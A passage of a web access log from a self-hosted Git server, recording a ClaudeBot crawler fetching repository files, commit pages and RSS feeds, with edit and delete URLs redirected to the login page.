+claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs?display=rendered" [Client 216.73.216.188] [Length 11148] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 216.73.216.188] [Length 12507] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 16155] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/database.sqlite" [Client 216.73.216.188] [Length 10061] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 216.73.216.188] [Length 44901] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json?display=rendered" [Client 216.73.216.188] [Length 11173] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/database.sqlite" [Client 216.73.216.188] [Length 1426] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" [Client 216.73.216.188] [Length 10667] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 216.73.216.188] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/database.sqlite" [Client 216.73.216.188] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 216.73.216.188] [Length 9822] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache?display=source" [Client 216.73.216.188] [Length 12417] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug/net8.0" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug/net8.0" -[15/Feb/2026:10:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static/js" -[15/Feb/2026:10:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 216.73.216.188] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json?display=source" [Client 216.73.216.188] [Length 37586] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/ChatBot.tsx" -[15/Feb/2026:10:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin" -[15/Feb/2026:10:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 216.73.216.188] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/project.nuget.cache" [Client 216.73.216.188] [Length 3399] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/Properties" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/project.assets.json" [Client 216.73.216.188] [Length 53066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/Properties" -[15/Feb/2026:10:51:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets/css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/ChatBot.tsx" -[15/Feb/2026:10:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 216.73.216.188] [Length 9821] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets/css" -[15/Feb/2026:10:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0" [Client 216.73.216.188] [Length 9824] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Worker.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs?display=source" [Client 216.73.216.188] [Length 11574] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Worker.cs" -[15/Feb/2026:10:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 216.73.216.188] [Length 9834] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 31835] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[15/Feb/2026:10:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json?display=source" [Client 216.73.216.188] [Length 11511] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[15/Feb/2026:10:51:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Worker.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 216.73.216.188] [Length 917] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Worker.cs" -[15/Feb/2026:10:51:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 216.73.216.188] [Length 953] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/css" -[15/Feb/2026:10:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 216.73.216.188] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 216.73.216.188] [Length 157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/appsettings.json" -[15/Feb/2026:10:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj" -[15/Feb/2026:10:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/appsettings.json" -[15/Feb/2026:10:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[15/Feb/2026:10:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/database.py" -[15/Feb/2026:10:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[15/Feb/2026:10:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit//asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[15/Feb/2026:10:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/database.py" -[15/Feb/2026:10:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" [Client 216.73.216.188] [Length 10100] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/TestService.csproj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit//asset_pilot_docker/README.md" -[15/Feb/2026:10:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/TestService.csproj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/TestService.csproj" -[15/Feb/2026:10:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 216.73.216.188] [Length 12013] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 